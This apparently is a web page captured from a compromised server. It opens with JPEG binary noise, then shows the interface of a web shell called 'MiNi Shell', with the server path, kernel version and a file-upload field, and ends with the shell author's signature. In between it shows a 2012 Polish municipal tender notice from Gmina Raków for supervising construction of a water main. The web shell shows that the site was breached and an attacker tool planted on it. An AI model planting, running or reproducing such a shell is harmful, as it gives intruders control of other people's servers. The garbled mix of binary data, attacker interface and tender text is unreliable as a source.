JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120507/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120507/143170-N-2012.html

<p class="kh_header"><b>Raków: Pełnienie nadzoru inwestorskiego
nad realizacją  zadania
pn. Budowa sieci wodociągowej   w Gminie Raków
Etap IV - Budowa sieci wodociągowej wraz z przyłączami w miejscowości Jamno, 
gm. Raków</b><br>
<b>Numer ogłoszenia: 143170 - 2012; data zamieszczenia: 07.05.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Raków , ul. Ogrodowa 1, 26-035 Raków, woj. świętokrzyskie, tel. 41 3535018, faks 41 3535018.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.rakow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Pełnienie nadzoru inwestorskiego
nad realizacją  zadania
pn. Budowa sieci wodociągowej   w Gminie Raków
Etap IV - Budowa sieci wodociągowej wraz z przyłączami w miejscowości Jamno, 
gm. Raków.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem niniejszego zamówienia jest pełnienie nadzoru inwestorskiego nad realizacją zadania pn. Budowa sieci wodociągowej   w Gminie Raków
Etap IV - Budowa sieci wodociągowej wraz z przyłączami w miejscowości Jamno, 
gm. Raków
2.Zakres robót budowlanych , dla których należy zapewnić nadzór obejmuje roboty budowlane polegające na budowie sieci wodociągowej z rur PE 160 mm, , a częściowo z rur PE fi 110  wraz z uzbrojeniem oraz  budowie przyłączy wodociągowych w ilości 25 szt z rur PE o średnicy 40 mm. Inwestycja realizowana będzie w obrębie działek w miejscowości  Jamno i Raków, gmina Raków.
	Zakres:
	Wodociąg z rur PE fi 160x9,5 o łącznej długości L=2940,0 mb
	Wodociąg z rur PE  fi 110x6,6 o łącznej długości L=65,0 mb
	Przyłącza wodociągowe - 25 szt. PE  fi40x2,4 o łącznej długości L=580,0 mb.
3.Wodociąg grupowy wraz z przyłączami z rur PE100 SDR17 PN10 zaopatrywał będzie 
w wodę zabudowania zlokalizowane głównie wzdłuż ciągów komunikacyjnych w miejscowości Jamno, który podłączony będzie z istniejącym systemem wodociągowym gminnym w miejscowości Raków. Włączenie do istniejącego wodociągu fi 225 PCV w miejscowości Raków na działce o nr ewid. 438/6
4.Opis inwestycji oraz szczegółowy zakres rzeczowy robót związanych z ich realizacją  określony  został w  dokumentacji projektowej oraz specyfikacji technicznej  wykonania i odbioru robót,  - udostępnionych dla przetargu na realizację robót budowlanych dla w/w zadania  na stronie internetowej http://rakow.bip.jur.pl oraz w siedzibie Zamawiającego.
Dokumentacja projektowa dla w/w zadania stanowi załącznik nr 9 do SIWZ.
Zamawiający  dopuścił w specyfikacji istotnych warunków zamówienia na roboty 	budowlane oferowanie produktów, materiałów i urządzeń równoważnych opisywanym, 
z zastrzeżeniem, że gwarantują one realizację zamówienia zgodnie z opisem przedmiotu 	zamówienia i zapewniają uzyskanie parametrów technicznych, jakościowych i funkcjonalno 	- użytkowych nie gorszych od założonych.
5.Inspektor Nadzoru jest przedstawicielem zamawiającego wobec wykonawcy robót budowlanych, w granicach posiadanego umocowania określonego w umowie. Inspektor
Nadzoru Inwestorskiego winien współpracować z zamawiającym zapewniając sprawną, zgodną z dokumentacją projektową i pozwoleniem na budowę obsługę realizacji zadania,jego odbioru, kontrolowanie rozliczeń budowy w tym sprawdzanie kompletności wszystkichdokumentów wykonawcy robót budowlanych przygotowywanych do odbioru końcowego 
i ich zgodności z dokumentacją projektową, potwierdzanie dokumentów zamawiającego
związanych z pozyskaniem i rozliczeniem środków finansowych na realizację zadania.
6.Zakres działania Inspektora Nadzoru Inwestorskiego określa obowiązująca ustawa z dnia 7 lipca 1994 r. Prawo budowlane  zgodnie z którą do  podstawowych obowiązków  inspektora nadzoru inwestorskiego należą:
- reprezentowanie inwestora na budowie przez sprawowanie kontroli zgodności jej realizacji z projektem i pozwoleniem na budowę, przepisami oraz zasadami wiedzy technicznej;
- sprawdzanie jakości wykonywanych robót i wbudowanych wyrobów budowlanych, 
a w szczególności zapobieganie zastosowaniu wyrobów budowlanych wadliwych 
i niedopuszczonych do stosowania w budownictwie;
- sprawdzanie i odbiór robót budowlanych ulegających zakryciu lub zanikających, uczestniczenie w próbach i odbiorach technicznych instalacji, urządzeń technicznych 
i przewodów kominowych oraz przygotowanie i udział w czynnościach odbioru gotowych obiektów budowlanych i przekazywanie ich do użytkowania;
- potwierdzanie faktycznie wykonanych robót oraz usunięcia wad, a także na żądanie inwestora, kontrolowanie rozliczeń budowy.
Inspektor nadzoru inwestorskiego ma prawo:
- wydawać kierownikowi budowy lub kierownikowi robót polecenia , potwierdzone wpisem do dziennika budowy, dotyczące: usunięcia nieprawidłowości lub zagrożeń, wykonania prób lub badań, także wymagających odkrycia robót lub elementów zakrytych, oraz przedstawienia ekspertyz dotyczących prowadzonych robót budowlanych i dowodów dopuszczenia do stosowania w budownictwie wyrobów budowlanych oraz urządzeń technicznych;
- żądać od kierownika budowy lub kierownika robót dokonania poprawek bądź ponownego wykonania wadliwe wykonanych robót, a także wstrzymania dalszych robót budowlanych w przypadku, gdyby ich kontynuacja mogła wywołać zagrożenie bądź spowodować niedopuszczalną niezgodność z projektem lub pozwoleniem na budowę.
7.Ponadto obowiązki Wykonawcy polegać będą na :
7.1.Wyegzekwowaniu od wykonawcy robót budowlanych obowiązku umieszczenia tablic informacyjnych budowlanych i unijnych na placu budowy.
7.2. Udział w przekazaniu wykonawcy robót budowlanych placu budowy.
7.3. Nadzór nad Wykonawcą w zakresie terminowego i prawidłowego przygotowania wszelkich niezbędnych dokumentów dotyczących  zawiadomienia o zamierzonym terminie  rozpoczęcia robót właściwych organów wynikających z ustawy Prawo budowlane oraz innych organów zgodnie z wydanymi przez nie decyzjami, uzgodnieniami, opiniami itp., 
o których mowa w decyzjach o pozwoleniu na budowę.
	7.4. Ogólnym nadzorze nad realizacją robót i ich finansowaniem zgodnie
	z harmonogramem.
	7.5. Sprawdzaniu posiadania przez kierownika budowy odpowiednich dokumentów atestów, 	świadectw jakości, wyników badań itp.) dotyczących dostarczonych elementów,materiałów, 	urządzeń i innych wyrobów oraz dokonania ich oceny jakości na placu budowy przed ich 	wbudowaniem.
	7.6. Stałym uczestnictwie w naradach technicznych, problemowych i innych
	organizowanych przez wszystkie strony procesu budowlanego.
	7.7. Podejmowaniu wszelkich  działań umożliwiających prawidłową realizację 	harmonogramu.
	7.8. Prowadzeniu nadzoru technicznego nad realizacją robót zgodnie z Prawem
	Budowlanym.
	7.9.Udział w załatwianiu spraw spornych z miejscową ludnością oraz skarg
	wynikających z realizowanych robót, w tym prowadzenie ewentualnych negocjacji
	w konfliktach z władzami samorządowymi i mieszkańcami.
	7.10. Współdziałanie z projektantem w czasie trwania realizacji przedmiotu umowy
celem rozwiązywania bieżących problemów realizacyjnych, w tym sprawowanie nadzoru 
w zakresie ewentualnych zmian od zatwierdzonego projektu budowlanego oraz weryfikacja 
i zatwierdzanie oferowanych przez Wykonawcę materiałów, urządzeń równoważnych.
	7.11. Przygotowywanie i przedstawianie do akceptacji Zamawiającego odpowiedzi na 	pytania, propozycje ze strony Wykonawcy w zakresie realizacji przedmiotu umowy.
	7.12. Przejęciu od wykonawcy robót budowlanych harmonogramu przedstawiającego
	cykl realizacji inwestycji.
	7.13. Potwierdzanie faktycznie wykonanego zakresu robót jako podstaw do fakturowania 	zgodnie z postanowieniami umowy zawartej pomiędzy Zamawiającym a Wykonawcą robót 	budowlanych, a także akceptowaniu faktur, po uprzedniej kontroli prawidłowości 	zafakturowania wykonanych robót. Sprawdzaniu, potwierdzaniu faktur wystawionych 	przez wykonawcę robót, potwierdzających 	zgodność wykonania robót z protokołem 	odbioru.
	7.14. Udział przy opracowaniu raportów, sprawozdań okresowych, wniosków o płatność.
	7.15. Przeprowadzanie kontroli na placu budowy w takich odstępach czasu aby była zapewniona skuteczność nadzoru nie rzadziej jednak niż jeden  raz w tygodniu oraz na każde wezwanie kierownika budowy lub Zamawiającego, a w okresie gwarancji/rękojmi 	za wady co najmniej jeden raz w ciągu sześciu miesięcy, a w przypadku potrzeby na 	wezwanie Zamawiającego.
	7.16. Uczestniczeniu przy przeprowadzaniu prób, pomiarów i sprawdzeń  itp.
	7.17.Wykonywaniu czynności związanych z przygotowaniem zrealizowanej inwestycji
	do odbioru, dokonaniem odbioru i przekazaniem inwestycji użytkownikowi
	wskazanemu przez Zamawiającego.
	7.18. W ramach czynności o których mowa w punkcie 6.17. Inspektor Nadzoru
	Inwestorskiego zobowiązany jest w szczególności do: stwierdzenia gotowości do
	odbioru elementów ulegających zakryciu oraz dokonanie odbiorów robót
	budowlanych  od wykonawcy robót oraz przekazanie przedmiotu 	odbioru wskazanemu przez zamawiającego użytkownikowi; nadzór na wykonawcą robót w zakresie 	powiadomienia stosownych organów (zgodnie z właściwością wynikającą z przepisów 	szczególnych) o zakończeniu budowy.
	7.19. Sprawowaniu nadzoru oraz weryfikacja dokumentacji powykonawczej 	(inwentaryzacja powykonawcza, atesty, próby, gwarancje jakości, analiza laboratoryjna 	wody, 	uzyskanie pozytywnego sprawozdania z badań wody stwierdzające że woda 	nadaje się do spożycia przez ludzi oraz innych dokumentów wymaganych przepisami 	prawa.)  W/w 	dokumentację inspektor zobowiązany jest 	potwierdzić własnoręcznym 	podpisem i pieczęcią. 
	7.20.Pomoc merytoryczna zamawiającemu z tytułu gwarancji/rękojmi za wady wykonanej
	inwestycji, dochodzeniu oraz egzekwowaniu od wykonawcy robót, z którym
	zawarta była umowa, należnych odszkodowań lub kar umownych za nienależyte
	lub nieterminowe wykonanie zobowiązań umownych.
	7.21.Udział w pierwszym oraz kolejnych przeglądach w okresie gwarancji/rękojmi za wady
	Z przeprowadzonego przeglądu Inspektor Nadzoru Inwestorskiego sporządzi
	protokół, w którym wyszczególni ewentualne wady i usterki, określi termin ich
	usunięcia, oraz zapewni stosowny nadzór nad robotami.
	7.22. Stałej konsultacji i doradztwie fachowym na rzecz zamawiającego aż do chwili 	rozliczenia finansowego projektu z Instytucją Zarządzającą RPOWŚ na lata 2007-2013.
	7.23. Kontrola, weryfikacja i zatwierdzanie  kosztorysów powykonawczych (gdy będą 	wymagane do rozliczeń związanych z dofinansowaniem z Unii Europejskiej w ramach 	Regionalnego Programu Operacyjnego Województwa Świętokrzyskiego).
	7.24. Zakres prac, za które odpowiedzialny będzie inspektor nadzoru obejmuje także
	przygotowanie i dostarczenie zamawiającemu wszelkich informacji związanych
	z inwestycją, wymaganych przez Instytucję Zarządzającą RPOWŚ na lata 2007-2013.
	7.25.Wyłoniony z przetargu wykonawca powinien w trakcie procesu budowlanego
	podejmować także inne działania, nie wymienione w tym rozdziale, które
	zabezpieczyłyby interes zamawiającego i przyczyniły się do prawidłowego wykonania 
	i rozliczenia inwestycji..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.24.70.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 10.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie  żąda wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, na podstawie oświadczenia  o spełnieniu warunków 	udziału w postępowaniu z art. 22 ust. 1 ustawy Prawo zamówień publicznych złożonego 	przez wykonawcę.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeżeli Wykonawca wykaże wykonanie w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy  - w tym okresie, co najmniej 1 usługi obejmującej pełnienie nadzoru inwestorskiego nad realizacją zadania związanego z przedmiotem zamówienia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony jeśli Wykonawca wykaże,że dysponuje 
 osobą/osobami  zdolnymi do wykonania zamówienia  - odpowiedzialnymi za świadczenie usług, kontrolę jakości posiadającymi uprawnienia:
w specjalności  instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych,   wentylacyjnych,  gazowych, wodociągowych i kanalizacyjnych 
 lub odpowiadające im uprawnienia/stwierdzenie przygotowania zawodowego do pełnienia  samodzielnych funkcji technicznych w budownictwie wydane na podstawie wcześniej obowiązujących  przepisów.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, na podstawie oświadczenia  o spełnieniu warunków 	udziału w postępowaniu z art. 22 ust. 1 ustawy Prawo zamówień publicznych złożonego 	przez wykonawcę.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Stosowne pełnomocnictwo do reprezentowania Wykonawcy, o ile ofertę składa pełnomocnik;
W przypadku wykonawców ubiegających się wspólnie o udzielenie zamówienia
dokument ustanawiający pełnomocnika do reprezentowania ich w postępowaniu
o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy
w sprawie niniejszego zamówienia publicznego;
w przypadku gdy wykonawca będzie korzystał z potencjału podmiotów trzecich - zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.
Formularz oferty, wskazane jest sporządzenie formularza wg wzoru
stanowiącego załącznik do SIWZ;</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Za zgodą zamawiającego dopuszcza się możliwość wprowadzenia istotnych zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy na podstawie art. 144 ust. 1 ustawy w przypadku wystąpienia poniższych okoliczności: 
a) W uzasadnionych przypadkach, możliwych zdarzeniach losowych Zamawiający
dopuszcza zmianę osoby/osób pełniących funkcję inspektora nadzoru inwestorskiego  pod warunkiem, że Zamawiający zostanie powiadomiony na piśmie i wyrazi na taką zmianę zgodę, a następca będzie posiadał uprawnienia do pełnienia samodzielnych funkcji technicznych w budownictwie  co najmniej jak poprzednik z zachowaniem przepisów ustawy Prawo budowlane,
b) gdy z przyczyn organizacyjnych konieczna będzie zmiana osób upoważnionych do dokonywania czynności, 
c) zmiana danych teleadresowych określonych w niniejszej umowie
2.Wszystkie powyższe postanowienia stanowią katalog zmian, na które Zamawiający może wyrazić zgodę. Nie stanowią jednocześnie zobowiązania do wyrażenia takiej zgody.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.rakow.bip.jur.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Raków,ul.Ogrodowa1, 26-035 Raków, pokój nr 25. Cena specyfikacji 10 PLN,płatna przelewem na konto: Bank Spółdzielczy w Szydłowie, Oddział Raków, Nr 85 8521 1016 2002 7004 7193 0078.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.05.2012 godzina 10:00, miejsce: Urząd Gminy w Rakowie , ul. Ogrodowa 1, 26-035 Raków sekretariat - pokój nr 14 
( I piętro).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt  współfinansowany przez Unię Europejską z Europejskiego Funduszu Rozwoju Regionalnego w ramach Regionalnego Programu Operacyjnego Województwa Świętokrzyskiego na lata 2007-2013.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com